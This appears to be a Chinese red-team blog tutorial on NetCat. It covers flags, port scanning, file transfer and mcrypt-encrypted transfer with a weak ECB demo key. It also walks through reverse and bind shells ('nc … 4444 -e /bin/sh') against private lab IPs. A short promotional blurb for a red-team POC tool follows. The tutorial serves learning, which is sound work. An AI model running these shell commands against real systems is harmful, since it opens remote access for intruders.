红队隧道应用篇之NetCat使用(十一)

简介

NetCat是一个通过TCP/UDP在网络中进行读写数据工具,被行内称为“瑞士军刀”,主要用于调试领域、传输领域以及黑客攻击领域。利用该工具可以将网络中一端的数据完整的发送至另一台主机终端显示或存储,常见的应用为文件传输、与好友即时通信、传输流媒体或者作为用来验证服务器的独立的客户端。

常用参数

  • -4 : 强制nc使用ipv4
  • -6 : 强制nc使用ipv6
  • -D : 使用socket的方式
  • -d : daemon(后台), 设置后台运行
  • -l : 开启监听模式
  • -n : 使用ip而不使用域名
  • -p : 使用本地主机的端口,默认是tcp协议的端口
  • -r : 任意指定本地及远程端口
  • –U : 使用Unix的socket
  • -u : 使用udp协议
  • -v : 详细输出
  • -z : 将输入输出关掉,即不进行交互,用于扫描时,注意在nmap的版本下没有这个参数
  • -w : 设置连接超时时间,单位秒

常用功能

1.端口扫描

扫描指定端口: nc -nvz 192.168.47.149 80

image-20221105204928414

扫描指定范围端口: nc -nvz 192.168.47.149 80-90

image-20221105205029760

2.文件传输

正向传输:客户端传送文件至服务端

服务端: nc -lp 4444 > result.txt

客户端: nc 192.168.47.134 4444 < result.txt

服务端按ctrl+c, 随后查看传送过来的result.txt文件

image-20221105231603152

反向传输:服务端传送文件至客户端

服务端: nc -lp 4444 < result.txt

客户端: nc -n 192.168.47.134 > result.txt

在客户端查看传送过来的result.txt文件

image-20221105232249836

3.加密传输文件

由于LINUX系统默认没有安装mcrypt库, 需先安装: apt-get install mcrypt

服务端: nc -lp 4444 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb -k 123456 > result.txt

客户端: mcrypt --flush -Fbq -a rijndael-256 -m ecb -k 123456 < result.txt | nc -nv 192.168.47.134 4444 -q 1

-k: 指定加密时所用到的密码, 若不指定, 输入回车时需要输入加密密码

image-20221106151706533

正向/反向Shell

反向Shell

如下图所示, 目标主机反向连接攻击机的4444端口, -e选项将Bash Shell发送给攻击机, 若目标主机为windows, 需设置成-e cmd

image-20221106162120338

先在攻击机开启监听4444端口: nc -lvp 4444

image-20221106161802417

在目标主机反弹Shell: nc 192.168.47.134 4444 -e /bin/sh

image-20221106161846933

再返回攻击机查看反弹回来的shell, 并输入ifconfig命令进行测试

image-20221106162013459

正向Shell

image-20221106162329078

先在目标主机创建监听, 并把一个bash shell绑定到4444端口

nc -lvp 4444 -e /bin/sh
image-20221106162559754

在攻击机连接目标主机的4444端口,以此来接收反弹的shell, 并输入ifconfig命令测试

nc 192.168.47.151
image-20221106162927333

关于nc无法使用-e参数

问题详情

由于很多Linux默认安装的是netcat-openbsd(老版本), 而NetCat老版本是无法使用-e参数的, 于是需要对其更新成netcat-traditional版本

解决方法

1.安装 netcat-traditional

apt-get -y install netcat-traditional
image-20221106161135696

2.配置netcat版本, 随后选择版本为traditional的编号并按回车键

update-alternatives --config nc
image-20221106161243527
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Goby红队版POC是一个专门为红队渗透测试设计的工具。红队渗透测试是指模拟攻击者的技术和策略来评估组织的网络安全防御能力,并识别潜在的漏洞和弱点。Goby红队版POC通过发现、测试和利用网络系统和应用程序中的漏洞,帮助安全团队更好地保护组织的网络。 Goby红队版POC的主要功能包括漏洞扫描、漏洞检测和漏洞利用。它可以扫描网络目标,查找可能存在的漏洞,并生成详细的报告。与传统的漏洞扫描工具不同,Goby红队版POC还具备漏洞检测的能力,可以通过发送特定的网络数据包来检测目标系统的漏洞。同时,它还提供了漏洞利用的功能,可以自动化地利用漏洞攻击目标系统,以验证漏洞的存在性,并帮助安全团队修补这些漏洞。 Goby红队版POC还具备一个直观的用户界面,使安全团队能够方便地管理和执行渗透测试任务。它提供了多种方式来配置和管理扫描任务,包括选择扫描目标、设置扫描选项、编写自定义POC等。同时,它还支持生成漏洞报告,以便安全团队更好地识别和修补漏洞。 总之,Goby红队版POC是一款功能强大的红队渗透测试工具,能够帮助安全团队发现和利用网络系统和应用程序中的漏洞,提高组织的网络安全防御能力。它的直观用户界面和丰富的功能使得安全团队能够更加高效地管理和执行渗透测试任务,并根据测试结果采取相应的修补措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值